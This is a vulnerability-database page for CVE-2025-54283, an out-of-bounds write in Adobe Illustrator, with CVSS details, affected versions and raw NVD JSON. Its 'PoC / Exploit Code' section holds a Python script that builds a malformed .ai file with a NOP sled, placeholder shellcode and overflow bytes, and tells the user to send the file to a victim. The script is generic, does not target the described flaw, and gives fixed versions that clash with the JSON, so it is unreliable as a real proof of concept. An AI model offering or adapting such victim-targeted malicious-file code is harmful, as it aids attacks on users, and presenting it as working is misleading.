Security Vulnerability Report
中文
CVE-2025-54283 CVSS 7.8 HIGH

CVE-2025-54283

Published: 2025-10-14 20:15:39
Last Modified: 2025-10-16 17:40:03

Description

Illustrator versions 29.7, 28.7.9 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:illustrator:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:illustrator:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe Illustrator 29.7 及更早版本
Adobe Illustrator 28.7.9 及更早版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54283 PoC - Adobe Illustrator Out-of-Bounds Write # This PoC demonstrates the concept of crafting a malicious Illustrator file # that triggers an out-of-bounds write vulnerability. import struct import os def create_malicious_ai_file(output_path): """ Create a malformed Adobe Illustrator (.ai) file that triggers an out-of-bounds write vulnerability (CVE-2025-54283). The vulnerability exists in the file parsing logic when processing certain object/path data structures without proper bounds checking. """ # AI file header (simplified PDF-based format) header = b"%PDF-1.5\n" # Craft a malicious object with oversized path data # This triggers the out-of-bounds write in the parser malicious_obj = b"" malicious_obj += b"1 0 obj\n" malicious_obj += b"<< /Type /XObject /Subtype /Form /BBox [0 0 612 792]" malicious_obj += b" /Length 999999" # Oversized length to trigger OOB write malicious_obj += b" /Resources << >> >>\n" malicious_obj += b"stream\n" # Inject shellcode payload (NOP sled + shellcode) # In real exploit, this would contain actual shellcode nop_sled = b"\x90" * 512 # NOP sled shellcode_placeholder = b"\x41" * 256 # Placeholder for shellcode malicious_obj += nop_sled malicious_obj += shellcode_placeholder # Overflow data to trigger out-of-bounds write overflow = b"\x41" * 4096 # Buffer overflow payload malicious_obj += overflow malicious_obj += b"\nendstream\n" malicious_obj += b"endobj\n" # Write the malicious file with open(output_path, 'wb') as f: f.write(header) f.write(malicious_obj) print(f"[+] Malicious AI file created: {output_path}") print(f"[!] Send this file to a victim using Adobe Illustrator < 29.7.1 / < 28.7.10") if __name__ == "__main__": output = "exploit_cve_2025_54283.ai" create_malicious_ai_file(output) print(f"[+] File size: {os.path.getsize(output)} bytes") print("[!] WARNING: This is for educational/research purposes only.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54283", "sourceIdentifier": "[email protected]", "published": "2025-10-14T20:15:39.390", "lastModified": "2025-10-16T17:40:03.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Illustrator versions 29.7, 28.7.9 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:illustrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "28.0", "versionEndExcluding": "28.7.10", "matchCriteriaId": "005808D0-1631-4EAF-A54F-2A38DC728D88"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:illustrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "29.0", "versionEndExcluding": "29.8", "matchCriteriaId": "C41A8A98-23D1-45C3-A88D-AAEF380C93A3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/illustrator/apsb25-102.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}